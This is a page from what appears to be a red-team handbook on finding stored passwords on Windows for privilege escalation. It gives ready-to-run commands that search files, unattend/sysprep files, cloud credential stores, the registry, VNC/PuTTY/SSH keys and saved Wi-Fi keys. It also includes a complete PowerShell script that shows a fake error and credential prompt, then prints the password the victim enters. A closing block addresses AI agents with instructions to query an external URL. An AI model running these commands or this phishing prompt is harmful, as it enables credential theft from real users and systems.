# Hunting For Passwords Low hanging fruit such as passwords may be exposed to a low privileged user which can be abused to escalate privileges. One way we can search for such passwords is this command. ``` dir /b /a /s c:\ > c:\temp\c-dirs.txt type c:\temp\c-dirs.txt | findstr /i passw ``` You can also replace `passw` with : `ssh, vnc` etc. Interesting files that may contain sensitive info are unattend files: ``` C:\Windows\sysprep\sysprep.xml C:\Windows\sysprep\sysprep.inf C:\Windows\sysprep.inf C:\Windows\Panther\Unattended.xml C:\Windows\Panther\Unattend.xml C:\Windows\Panther\Unattend\Unattend.xml C:\Windows\Panther\Unattend\Unattended.xml C:\Windows\System32\Sysprep\unattend.xml C:\Windows\System32\Sysprep\unattended.xml C:\unattend.txt C:\unattend.inf ``` You can search for these files with: ``` dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul ``` More interesting files are: ``` VARIABLES.DAT setupinfo setupinfo.bak web.config SiteList.xml .aws\credentials .azure\accessTokens.json .azure\azureProfile.json gcloud\credentials.db gcloud\legacy_credentials gcloud\access_tokens.db ``` Sensitive passwords may also reside in registry: ``` reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` We can also look for vnc credentials and ssh keys (a good tool for this is ) ``` reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKCU\Software\TightVNC\Server" reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" reg query "HKCU\Software\OpenSSH\Agent\Keys" ``` WIFI passwords may also be the same as the web page passwords: ``` cls & echo. & for /f "tokens=4 delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name=%a key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on ``` ## Credential Popup You can simply make a credential popup and pray that the user enters their creds into the popup, an implementation is here: ``` # POC from greg.foss[at]owasp.org # @enigma0x3 # Adapted from http://blog.logrhythm.com/security/do-you-trust-your-computer/ # https://enigma0x3.wordpress.com/2015/01/21/phishing-for-credentials-if-you-want-it-just-ask/ function Invoke-Prompt { [CmdletBinding()] Param ( [Switch] $ProcCreateWait, [String] $MsgText = 'Lost contact with the Domain Controller.', [String] $IconType = 'Critical', [String] $Title = 'ERROR - 0xA801B720' ) Add-Type -AssemblyName Microsoft.VisualBasic Add-Type -assemblyname System.DirectoryServices.AccountManagement $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine) if($MsgText -and $($MsgText -ne '')){ $null = [Microsoft.VisualBasic.Interaction]::MsgBox($MsgText, "OKOnly,MsgBoxSetForeground,SystemModal,$IconType", $Title) } $c=[System.Security.Principal.WindowsIdentity]::GetCurrent().name $credential = $host.ui.PromptForCredential("Credentials Required", "Please enter your user name and password.", $c, "NetBiosUserName") if($credential){ while($DS.ValidateCredentials($c, $credential.GetNetworkCredential().password) -ne $True){ $credential = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","") } "[+] Prompted credentials: -> " + $c + ":" + $credential.GetNetworkCredential().password } else{ "[!] User closed credential prompt" } } ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kwcsec.gitbook.io/the-red-team-handbook/techniques/privilege-escalation/hunting-for-passwords.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.